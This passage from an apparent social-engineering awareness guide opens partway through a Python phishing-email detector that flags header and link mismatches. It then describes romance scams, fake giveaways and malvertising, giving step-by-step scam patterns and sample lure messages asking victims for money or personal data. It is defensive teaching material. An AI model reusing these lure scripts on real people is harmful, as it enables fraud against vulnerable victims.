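To: victim@example.org
Subject: Your March statement
Content-Type: text/html; charset=utf-8

<html><body><p>Your monthly statement is ready.
<a href="https://www.examplebank.example/statements">View statement</a></p></body></html>
"""


class Anchors(HTMLParser):
    """Collect (href, visible text) pairs plus the page's visible text."""
    def __init__(self):
        super().__init__()
        self.links, self.text = [], []
        self._href, self._buf = None, []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "a":
            self._href, self._buf = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        self.text.append(data)
        if self._href is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "a" and self._href is not None:
            self.links.append((self._href, " ".join("".join(self._buf).split())))
            self._href = None


def registrable(host: str) -> str:
    """Naive registrable domain: last two labels, lower-cased (assumption)."""
    return ".".join(host.lower().split(".")[-2:])


def analyze_message(raw: bytes) -> list:
    """Return (rule, detail) findings for header and link inconsistencies."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    sender = registrable(parseaddr(str(msg["From"]))[1].split("@")[-1])
    if msg["Reply-To"]:
        reply = registrable(parseaddr(str(msg["Reply-To"]))[1].split("@")[-1])
        if reply != sender:
            findings.append(("reply-to-mismatch", f"{sender} vs {reply}"))

    body = msg.get_body(preferencelist=("html", "plain"))
    page = Anchors()
    page.feed(body.get_content() if body else "")
    for href, text in page.links:
        target = registrable(urlparse(href).netloc)
        shown = HOST_IN_TEXT.search(text)           # a hostname written in the link text
        if shown and registrable(shown.group(1)) != target:
            findings.append(("link-text-mismatch",
                             f"text says {shown.group(1)}, href goes to {target}"))
        if target and target != sender:
            findings.append(("sender-link-mismatch", f"{sender} mails a link to {target}"))

    haystack = (str(msg["Subject"]) + " " + " ".join(page.text)).lower()
    hits = [w for w in URGENCY if w in haystack]
    if hits:
        findings.append(("urgency-language", ", ".join(hits)))
    return findings


if __name__ == "__main__":
    for rule, detail in analyze_message(PHISH):
        print(f"{rule:<22} {detail}")
    print("benign:", analyze_message(BENIGN))
```

None of these rules proves a message is malicious on its own (marketing mail fails the sender-link rule constantly); their value is in scoring and in surfacing the mismatch to the recipient, so that when the follow-up call arrives the "I see you just tried to verify online" opener no longer sounds plausible.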

Honey Traps / Romance Scams – Emotional Exploitation for Info or Money

Description:

Honey traps (also known as romance scams) are a form of emotional manipulation in which an attacker builds a romantic relationship with the victim in order to exploit them for money or personal information. The scammer typically pretends to be someone seeking emotional connection, creating a sense of trust and affection over time. Once the emotional bond is established, the scammer will manipulate the victim into providing money or sensitive data under false pretenses.

Examples:


Example 1: The Long-Distance Relationship Scam

  • Scenario: An attacker creates a fake online dating profile and begins a long-distance relationship with the victim, gaining their trust over several weeks or months.
  • Steps:
    1. Initial Contact: The scammer engages the victim with fake stories of shared interests.
    2. Trust Development: As the relationship progresses, the scammer builds emotional bonds.
    3. The Emotional Appeal: The attacker claims to have a financial emergency, needing money to return home or resolve a crisis.
    4. Exploitation: Victim is asked to send money to help the scammer return home or resolve the emergency.
  • Example Phrase:

    "I miss you so much. I’ve been stuck here in this foreign country, and I really need your help to get back. Please send me $2,000, and I’ll pay you back as soon as I return."


Example 2: Fake Investment or Business Opportunity

  • Scenario: A scammer builds a romantic relationship, then offers a fake business or investment opportunity, claiming it will help both of them grow financially.
  • Steps:
    1. Initial Contact: The scammer connects with the victim, claiming to be an experienced entrepreneur.
    2. Relationship Development: They form a close relationship based on mutual business interests.
    3. The Pitch: After building trust, the scammer proposes a business deal or investment opportunity.
    4. Exploitation: The victim is convinced to invest money, believing they’ll make substantial returns.
  • Example Phrase:

    "This is the perfect opportunity to make some real money. If you invest now, we can grow this together. I need your help, and I’ll pay you back once it’s successful."


Example 3: Fake Military or Emergency Scam

  • Scenario: The attacker pretends to be an active military member or worker stranded abroad, needing financial assistance to return home.
  • Steps:
    1. Initial Contact: The scammer poses as a soldier or worker in a foreign country.
    2. Relationship Development: Over time, they establish an emotional connection with the victim.
    3. The Emergency: The scammer claims to be in a dangerous situation, requiring money to return home or cover medical bills.
    4. Exploitation: The victim is asked to send money out of sympathy or concern for the scammer's safety.
  • Example Phrase:

    "I’ve been injured while working here, and the army is not covering the expenses. I need your help to get back home. Can you send $3,000 to help me return?"


Fake Contests / Giveaways

Description:

Fake contests and giveaways are one of the most common social engineering techniques used to collect personal information from victims. These scams promise valuable prizes (such as free iPhones, gift cards, or electronics) but are designed to trick people into submitting their personal information or performing certain actions that benefit the attacker.

Example:

  1. Fake iPhone Giveaway via Social Media:

    • Scenario: A popular influencer posts on Instagram:
      “🎉 Win a FREE iPhone! 🎉 Just follow me, like this post, and tag 3 friends! 🎁 Link in bio! 🚨”
    • What Happens: Victims click the link in the bio, which directs them to a fake page asking for personal information like name, email address, and shipping details.
    • Outcome: Victims are never contacted about the prize, and their data is harvested for further exploitation.
  2. Fake Giveaway via Email:

    • Scenario: A message appears in your inbox, saying “Congratulations! You’ve won a $500 Amazon gift card! Click here to claim your prize!”
    • What Happens: Clicking the link leads to a page asking for personal data or payment information for “shipping fees.”
    • Outcome: Victim’s credit card details are stolen or the email address is added to a phishing list.
  3. Smishing (Fake Contest via SMS):

    • Scenario: A text message reads:
      “Congrats! You’ve won a free iPhone X! Click here to claim your prize NOW – limited time offer.”
    • What Happens: The victim clicks the link, which leads to a page where they’re asked to enter personal details to receive the prize.
    • Outcome: Victim’s data is stolen or malware is installed on their phone.
  4. Fake Contest Form on a Popular Website:

    • Scenario: A popup on a well-known site reads:
      “Hurry! You’re the 1,000th visitor! Win a brand-new iPhone 14, fill out this short form to claim it.”
    • What Happens: The form asks for name, phone number, and email address, after which the victim is told to share with friends for a greater chance of winning.
    • Outcome: Victim’s data is collected and sold to third parties.

Why It Works:

  • Greed and FOMO: Victims are tempted by the possibility of winning valuable prizes.
  • Urgency: Attackers often create a sense of urgency to push the victim into acting quickly.
  • Social Proof: Seeing others participate or winning can lead to greater trust in the scam.

Malicious Advertisements (Malvertising)

Malvertising is the practice of using online advertisements to distribute malicious software, often by redirecting users to exploit kits or other malicious websites. These ads can appear on trusted websites and are often delivered through ad networks, making it difficult to distinguish between legitimate ads and harmful ones.

How Malvertising Works

  1. Ad Placement: Malicious actors inject harmful code into legitimate advertising networks. Once added, these ads are served on popular websites without the website owner's knowledge.

  2. Exploitation: When a user interacts with an ad (by clicking or even just viewing it), it can trigger an exploit kit or malware downloader that attempts to exploit vulnerabilities in the user's system.

  3. Exploit Kits: Exploit kits like Angler, RIG, or Sundown are often used in malvertising attacks. These kits look for vulnerabilities in the user's browser, plugins, or operating system, and try to deliver a malicious payload if a vulnerability is found.

  4. Types of Malware Delivered:

    • Ransomware (e.g., CryptoLocker)
    • Spyware or keyloggers
    • Trojans for remote access
    • Cryptominers

Examples of Malvertising

Example 1: Fake Adobe Flash Update (Redirect to Malware)

  • Scenario: A user visits a trusted news site or social media platform. A pop-up or banner ad appears offering a "free Adobe Flash Player update". When clicked, it redirects the user to a fake Adobe website, asking to download the update.
  • Outcome: This update is actually malware, and once downloaded, it installs ransomware or a backdoor Trojan onto the user's system.

Example 2: Drive-By Downloads via Malvertising (Exploit Kit)

  • Scenario: A legitimate website shows a banner ad with a disguised JavaScript redirect. The user does not need to click the ad; simply viewing it triggers a redirect to a site hosting an exploit kit.
  • Outcome: The exploit kit scans the user's browser and plugins for vulnerabilities. If a vulnerability is found, it silently installs banking Trojans (e.g., Emotet) or ransomware.

Example 3: Fake Software Download Ads

  • Scenario: A user encounters an ad for a "Free Video Downloader" on a popular video streaming website. Clicking the ad leads to a site that looks like it offers free software downloads.
  • Outcome: The downloaded software is actually a malicious trojan or adware that gathers personal information or floods the system with unwanted ads.

Real-World Example: 2016 Campaign on Major News Sites

In March 2016, a malvertising campaign placed malicious ads on major sites including The New York Times, BBC, MSN and AOL through legitimate ad networks. Visitors who were merely served the ad were redirected to the Angler exploit kit, which delivered ransomware to machines with unpatched browsers or plugins; no click was required. Because the host sites themselves were not compromised, the practical defenses are on the client side: keep browsers and plugins patched, and block or sandbox ad content.